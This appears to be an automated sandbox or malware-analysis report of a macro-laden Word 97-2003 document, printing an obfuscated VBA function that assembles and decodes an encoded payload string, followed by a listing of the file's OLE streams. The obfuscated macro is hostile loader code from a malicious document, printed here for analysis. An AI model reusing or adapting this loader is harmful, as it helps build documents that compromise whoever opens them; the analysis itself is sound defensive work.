    Dim FKqOztxLLjavwwStRF As String

    Dim vaWnApNUERVVdUevRMo As String

    Dim OpHnpOXn As String

    Dim qbvQHsuOUgPR As String

    Dim gwxEIxlJXcH As String

    Dim GCWiglwNCH As String

    Dim JnhhTKXdDMF As String

    Dim ubpLU As String

    Dim QnTcsgLLYY As String

    Dim hICkWL As String

    Dim DAsxVsHQJ As String

    Dim GDjgDLPOpTOH As String

    Dim rVgmmXcuFt As String

    GDjgDLPOpTOH = "SRDBOBInINIIN" & sfiSFQuRDPlM("498e494b7f5f469d7882636e9f9f676e75879d424a504a44") & "SRD" & "OIkINIIKBBJDSRTDOBIINIxtINIdng\YSIKBK" & "PnwPIivhknfIJJDRSTDOBIINIINIIKNIpIMJDU" & sfiSFQuRDPlM("9d529f9d539f9d549f9d569f44424f8842")

    OpHnpOXn = "MF" & "u}" & "F" & "MF" & "m}F" & "G" & "F" & "PDw" & "pD" & "KGTWX" & "]Fu}" & "FN" & "Fu}F" & "_F" & "u}F" & "lNF" & "u}F" & sfiSFQuRDPlM("9d819f7f9f5d") & "FH" & "JIGIKF" & sfiSFQuRDPlM("5f4a469d8b9f4d53") & "KGTWX]F" & "_JF" & sfiSFQuRDPlM("8a9f4d46") & "}FkKGTWX]Fu}FNFu}F_F}FNF}F" & "k"

    qbvQHsuOUgPR = sfiSFQuRDPlM("5f504a449d53") & "R" & "TDB" & "OBI" & "qlIN" & "Ip" & sfiSFQuRDPlM("4f494e4987") & sfiSFQuRDPlM("6576494b424a") & "DRT" & sfiSFQuRDPlM("9d559f9d539f44") & "OBIu" & sfiSFQuRDPlM("7b9596876f5070") & "vINI" & "vINI" & "PyINIge" & sfiSFQuRDPlM("6b87494b") & "]F_JDRT" & "[XWS" & sfiSFQuRDPlM("9d53539f9d5352") & "ZU" & "VYDOIoINISYPRRW" & "INIBuINIBpvBSRPINIRBJSXTINIuBI" & ""

    rVgmmXcuFt = sfiSFQuRDPlM("6b76424f996b906691") & sfiSFQuRDPlM("999542426a8b6686677042424242") & sfiSFQuRDPlM("424f424248484242655c7e798b90669179757e959b9576678f55547e656f665067") & "zBBQGjGD"

    vaWnApNUERVVdUevRMo = sfiSFQuRDPlM("4e496694") & "I" & "NI[[" & sfiSFQuRDPlM("4b494e49") & "IN" & "IIN" & "II" & "NIPR" & "SRYPR" & sfiSFQuRDPlM("52525a42") & "" & "]ByI" & "K]F" & sfiSFQuRDPlM("82659f50") & "Djg" & "cgu" & "DPJDR" & sfiSFQuRDPlM("9d539f44424f") & "IcfIN" & "IfIK" & "Pk" & sfiSFQuRDPlM("918d874a4a449d53") & "TR" & "UDBO" & "IOcINIw" & sfiSFQuRDPlM("494e499587494e4990") & sfiSFQuRDPlM("96494b4e469d779f") & "K]FPD" & "rtqD_B" & "FxSk\\Dfg" & "nvgdrtq"

    DAsxVsHQJ = "IINIINII" & sfiSFQuRDPlM("4e49919072") & "NuINI" & sfiSFQuRDPlM("494b4b5044758267") & "vcngDJ" & "FpwNJPJDTS" & sfiSFQuRDPlM("529f444f8849") & sfiSFQuRDPlM("6576494e494f71846c67494e49706799494b424a449d549f") & "WRS" & "VY[ZXUDBOIgINIeINIeINIpiINI" & "INInINIINIpuPigpgINIjugv}vINIPjcI"

    KrunKQYb = "INIZ" & "fINI" & sfiSFQuRDPlM("8d66729199") & sfiSFQuRDPlM("8794758a") & sfiSFQuRDPlM("878e8e494e") & "IZf" & sfiSFQuRDPlM("494e4985") & "INIfuINI" & sfiSFQuRDPlM("95494e4981494e49") & "Z" & "frI" & "NIo" & sfiSFQuRDPlM("9188965a494e49798b90") & "INIjmgI" & sfiSFQuRDPlM("4e496e494e495a49") & "NIINIdI" & "NIINI" & sfiSFQuRDPlM("494e49918896") & "INIoceINIuIKKOtg" & sfiSFQuRDPlM("926e83658742424a7d858a63747f57") & "XM}ctSRYM}ctXZKN}ct[TKMJDT" & ""

    QnTcsgLLYY = "D]F" & "ePD" & "rqz" & sfiSFQuRDPlM("7b44504485") & "tg" & "pvkcnD" & "B_BBBFm" & "f\\D" & sfiSFQuRDPlM("87826863778e") & "" & "tmetgfgvk" & sfiSFQuRDPlM("63826e75445d46") & sfiSFQuRDPlM("9d9585748b8292765c92") & "tqz{" & sfiSFQuRDPlM("9f425f42469d7982859f5044") & "tzD]F" & "_BBJBBPJD" & "TSRDBOIngIN" & "IctINIxIKBJD" & "SRDO" & sfiSFQuRDPlM("884249988f494e496493494b42424b5098638e")

    zLcoKRaYmjuuyzJFwvb = "DBO" & "BI" & sfiSFQuRDPlM("494e4963") & "IKP" & "k" & "JJ" & sfiSFQuRDPlM("449d549f") & sfiSFQuRDPlM("9d529f9d53") & "DOB" & "IINI" & sfiSFQuRDPlM("64494e4967") & sfiSFQuRDPlM("9083848e87") & sfiSFQuRDPlM("7585948b49") & "KMJDT" & "SR" & sfiSFQuRDPlM("9f44424f8849") & "INI" & sfiSFQuRDPlM("8b494e498e") & sfiSFQuRDPlM("91858d6e9189") & "IKNRK]F" & "cnP" & "JDSRD" & "OBIffINIcI" & sfiSFQuRDPlM("4b506b9098918d") & "JJDUVXTZ" & "YWRS[DO" & "BIINInINI" & "dINI"

    ubpLU = "BIWINIINIQINIUINIZQINIwINIQINIv|" & sfiSFQuRDPlM("63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d")

    GCWiglwNCH = "g" & sfiSFQuRDPlM("494e498e") & "uIN" & "I" & "IN" & "IIN" & sfiSFQuRDPlM("4991494e") & "I" & "kI" & "NI" & "I" & "KNRK]F" & "ire}JJ" & "JDSX" & sfiSFQuRDPlM("9f9d529f") & sfiSFQuRDPlM("9d539f9d53599f") & sfiSFQuRDPlM("9d53549f9d") & "TVVT" & "USR" & "TUSUT" & "STT" & "[ZSVS" & "[W" & sfiSFQuRDPlM("9d53579f") & "SSSZ" & "YX" & "TWTRDOBI{nINIqecINIgZINIINIjkpINIf"

    FKqOztxLLjavwwStRF = "]F" & "Od" & sfiSFQuRDPlM("9a919446") & "u}" & "JFu}" & "Fk" & sfiSFQuRDPlM("4d469d95") & "}F" & "K" & "GTWX" & "]F" & "v_F" & "PJ" & "DTS" & "RU" & "DOIf" & sfiSFQuRDPlM("96494e497179708e9163") & "fINIfINIcIK" & "Pk" & "JJDZSU" & "SX[ST" & sfiSFQuRDPlM("53539f9d53579f9d549f9d53529f") & sfiSFQuRDPlM("9d535b9f9d529f9d599f") & "TRUSYW" & "VSV" & sfiSFQuRDPlM("589f9d539f9d535a9f444f")

    gwxEIxlJXcH = "KKKB" & sfiSFQuRDPlM("424a80484a") & sfiSFQuRDPlM("449d539f") & sfiSFQuRDPlM("9d529f9d") & sfiSFQuRDPlM("549f9d559f") & sfiSFQuRDPlM("44424f88") & sfiSFQuRDPlM("42498449") & "NIvO" & sfiSFQuRDPlM("7863748b") & "cINInINI" & sfiSFQuRDPlM("494b42424a449d") & sfiSFQuRDPlM("529f9d53") & "DBOI" & "|INIuIKBOcn" & "BKPDu" & "odn{DPJ" & "DTRSDOIv" & "INIgINIi" & "gIKPkJJDWYR" & "SXZTVUDOIPcINIINIcwINI"

    nmsYxXkvZCrJZXc = "wg\\" & "Due" & "kD" & "PJD" & sfiSFQuRDPlM("529f9d53") & sfiSFQuRDPlM("9f44424f88") & "Iigvd" & "{INI" & "IKP" & "k" & "JJDV" & "UXT" & "SRW" & sfiSFQuRDPlM("9f44424f8849878757") & "RZ" & "RINIY" & sfiSFQuRDPlM("8385494e49") & sfiSFQuRDPlM("86494e495b545549") & "NITRINIZZ[S" & "INIU" & "YYIKK]Ft_FfNFm_Ftiu]" & "F_RPPTWW]RPP" & "TWWHJIGIKFl_JF"

    thaycyR = "NII" & sfiSFQuRDPlM("4e497091") & "r" & "INI" & "IK" & "KPJD" & "TSR" & sfiSFQuRDPlM("9f444f8842498749") & "NII" & "NIuvx" & "IKPk" & "JFw" & "NFvtg" & "K]]" & sfiSFQuRDPlM("424a424280484a449d") & sfiSFQuRDPlM("549f9d529f9d539f4442") & "OIvOINI" & "tcgINIigIK" & "BJDSRDBOIVmIN" & "IRIKBKP" & "g\\Dgz" & "rgSRRvwgD_R]F"

    hICkWL = sfiSFQuRDPlM("494e498e") & sfiSFQuRDPlM("494e4975") & "" & sfiSFQuRDPlM("8f506f83") & sfiSFQuRDPlM("908389494e") & "IINI" & sfiSFQuRDPlM("878f8790") & "INI" & sfiSFQuRDPlM("968b91905049") & "KKHJ" & sfiSFQuRDPlM("4961494b9d46") & "" & "PJIGIK" & sfiSFQuRDPlM("469d819f504a449d") & "ST" & "RDO" & "IkgfINI" & "iINIg" & sfiSFQuRDPlM("68494b506b9098918d") & "JJDTR" & "SUDOIkINIINIIN" & "IhIKNJDVTR" & "WS" & "UDOIuINIININI"

    JnhhTKXdDMF = "VPPF" & "c" & "P" & "Dng" & "p" & "jD]" & "Olk" & "}ej" & "}J" & "HBF" & "BF" & "vB" & "JFx" & "MFKK" & sfiSFQuRDPlM("809e504a449d529f9d") & "SDO" & sfiSFQuRDPlM("88496b67494e497a49") & "KHHBuBBBtd" & "j_e" & "qBBzBJ" & sfiSFQuRDPlM("658b426770985c75768b") & "KPxcnw" & "BBqytB" & "OpkeBOB" & "rcuBBOptkgBBOpqg"



    rMOBquizQidfuY4 = sfiSFQuRDPlM("6d959570839187") & sfiSFQuRDPlM("838f8f9386906a6b") & ""

    sTNVQqU = "||p" & sfiSFQuRDPlM("918792758c6b9b8a668f92858c6f91907b736b6a8b78927b84")

    rMOBquizQidfuY4 = "kg|e|z" & "t"

    sTNVQqU = zLcoKRaYmjuuyzJFwvb & GCWiglwNCH & KrunKQYb & GDjgDLPOpTOH & DAsxVsHQJ & gwxEIxlJXcH & hICkWL & thaycyR & qbvQHsuOUgPR & vaWnApNUERVVdUevRMo & QnTcsgLLYY & nmsYxXkvZCrJZXc & OpHnpOXn & FKqOztxLLjavwwStRF & ubpLU & JnhhTKXdDMF & rVgmmXcuFt

    sTNVQqU = czeoPYDHuXBP(sTNVQqU)

    lFqpVWxqJDWI = sTNVQqU

End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 892

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	892
Entropy:	3.23742130194
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . , . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 2c 01 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 392

General
Stream Path:	\x5SummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	392
Entropy:	3.28480487252
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j o h n . . . . . . . . . . . . . . . . . . . . . . . . N o r m
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 07 00 00 00 c4 00 00 00 08 00 00 00 d8 00 00 00 09 00 00 00 e8 00 00 00 12 00 00 00 f4 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 9668

General
Stream Path:	1Table
File Type:	data
Stream Size:	9668
Entropy:	5.64419844965
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 1b 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 12708

General
Stream Path:	Data
File Type:	data
Stream Size:	12708
Entropy:	7.74153779497
Base64 Encoded:	True
Data ASCII:	( . . . D . d . . . . . . . . . . . . . . . . . . . . . K . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . c . . . $ . . . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . ? . . . . . 3 . " . . . . . . . . . ` . . . . . . . ? . . . . . . . . . . . . . . . . . 2 . . . r . . . . . . \| 4 . . @ . . . f . j . . . ~ . . N . . . . . . . D . . . . . 2 . ` ! . . F . . . . \| 4 . . @ . . . f . j . . . ~ . . . . . . . . . . . . . .
Data Raw:	28 04 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 00 4b 00 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 62 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 24 00 00 00 7f 00 80 00 80 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 0c 00 1f 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 446

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF, CR line terminators
Stream Size:	446
Entropy:	5.13841462293
Base64 Encoded:	True
Data ASCII:	I D = " { 4 6 B 9 0 0 9 F - 8 E C 0 - 4 E 2 0 - 9 2 8 4 - 9 3 A F 6 0 C 8 4 C C 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F C F E 2 B 5 E 3 D E D 4 1 E D 4 1 E D 4 1 E D 4 1 " . . D P B = " 8 7 8 5 5 0 D 7 5 0 E 9 D A E A D A E A D A " . . G C = " 1 2 1 0 C 5 6 C 5 1 6 D 5 1 6 D A E " . . . . [ H o s t E x t e n d e r I n f
Data Raw:	49 44 3d 22 7b 34 36 42 39 30 30 39 46 2d 38 45 43 30 2d 34 45 32 30 2d 39 32 38 34 2d 39 33 41 46 36 30 43 38 34 43 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.07738448508
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6962

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	6962
Entropy:	5.70770895748
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 771

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	771
Entropy:	6.44362798044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . \\ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . w . . \\ .
Data Raw:	01 ff b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 8d e5 d3 5c 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: MsoDataStore/\x201\x222E\x216\x202\x215O\x202\x206EW\x211J\x2074\x211LZR\x213WQ==/Item, File Type: ASCII text, with no line terminators, Stream Size: 216

General
Stream Path:	MsoDataStore/\x201\x222E\x216\x202\x215O\x202\x206EW\x211J\x2074\x211LZR\x213WQ==/Item
File Type:	ASCII text, with no line terminators
Stream Size:	216
Entropy:	4.97098452447
Base64 Encoded:	False
Data ASCII:	< b : S o u r c e s S e l e c t e d S t y l e = " \\ A P A . X S L " S t y l e N a m e = " A P A " x m l n s : b = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " x m l n s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " > < / b : S o u r c e s >
Data Raw:	3c 62 3a 53 6f 75 72 63 65 73 20 53 65 6c 65 63 74 65 64 53 74 79 6c 65 3d 22 5c 41 50 41 2e 58 53 4c 22 20 53 74 79 6c 65 4e 61 6d 65 3d 22 41 50 41 22 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f 72 67 2f 6f 66 66 69 63 65 44 6f 63 75 6d 65 6e 74 2f 32 30 30 36 2f 62 69 62 6c 69 6f 67 72 61 70 68 79 22

Stream Path: MsoDataStore/\x201\x222E\x216\x202\x215O\x202\x206EW\x211J\x2074\x211LZR\x213WQ==/Properties, File Type: XML document text, Stream Size: 341

General
Stream Path:	MsoDataStore/\x201\x222E\x216\x202\x215O\x202\x206EW\x211J\x2074\x211LZR\x213WQ==/Properties
File Type:	XML document text
Stream Size:	341
Entropy:	5.27126762276
Base64 Encoded:	True
Data ASCII:	< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > . . < d s : d a t a s t o r e I t e m d s : i t e m I D = " { A B 3 8 E 1 A 7 - A A 7 3 - 4 5 B 8 - B 3 2 6 - F 7 B 3 2 D 9 4 7 5 5 9 } " x m l n s : d s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / c u s t o m X m l " > < d s : s c h e m a R e f s > < d s : s c h e m a R e f d s : u r i = " h t t p : / / s c h e m a s . o p e n
Data Raw:	3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0d 0a 3c 64 73 3a 64 61 74 61 73 74 6f 72 65 49 74 65 6d 20 64 73 3a 69 74 65 6d 49 44 3d 22 7b 41 42 33 38 45 31 41 37 2d 41 41 37 33 2d 34 35 42 38 2d 42 33 32 36 2d 46 37 42 33 32 44 39 34 37 35 35 39 7d 22 20 78 6d 6c

Stream Path: ObjectPool/_1587790099/\x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	ObjectPool/_1587790099/\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/\x3OCXNAME, File Type: data, Stream Size: 24

General
Stream Path:	ObjectPool/_1587790099/\x3OCXNAME
File Type:	data
Stream Size:	24
Entropy:	2.36400546285
Base64 Encoded:	False
Data ASCII:	M . u . l . t . i . P . a . g . e . 1 . . . . .
Data Raw:	4d 00 75 00 6c 00 74 00 69 00 50 00 61 00 67 00 65 00 31 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1587790099/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1587790099/f, File Type: data, Stream Size: 174

General
Stream Path:	ObjectPool/_1587790099/f
File Type:	data
Stream Size:	174
Entropy:	2.739896893
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . 3 . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 7f 00 00 00 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 70 00 00 00 00 83 01 69 00 00 18 00 e4 01 00 00 01 00 00 00 94 00 00 00 02 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 00 00 07 00 50 61 67 65 31 00 00 00 33 00 00 00 ae 02 00 00 00 00 24 00 d5 01

Stream Path: ObjectPool/_1587790099/i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	ObjectPool/_1587790099/i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/i02/f, File Type: data, Stream Size: 40

General
Stream Path:	ObjectPool/_1587790099/i02/f
File Type:	data
Stream Size:	40
Entropy:	1.43242595434
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	ObjectPool/_1587790099/i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: ObjectPool/_1587790099/i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	ObjectPool/_1587790099/i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
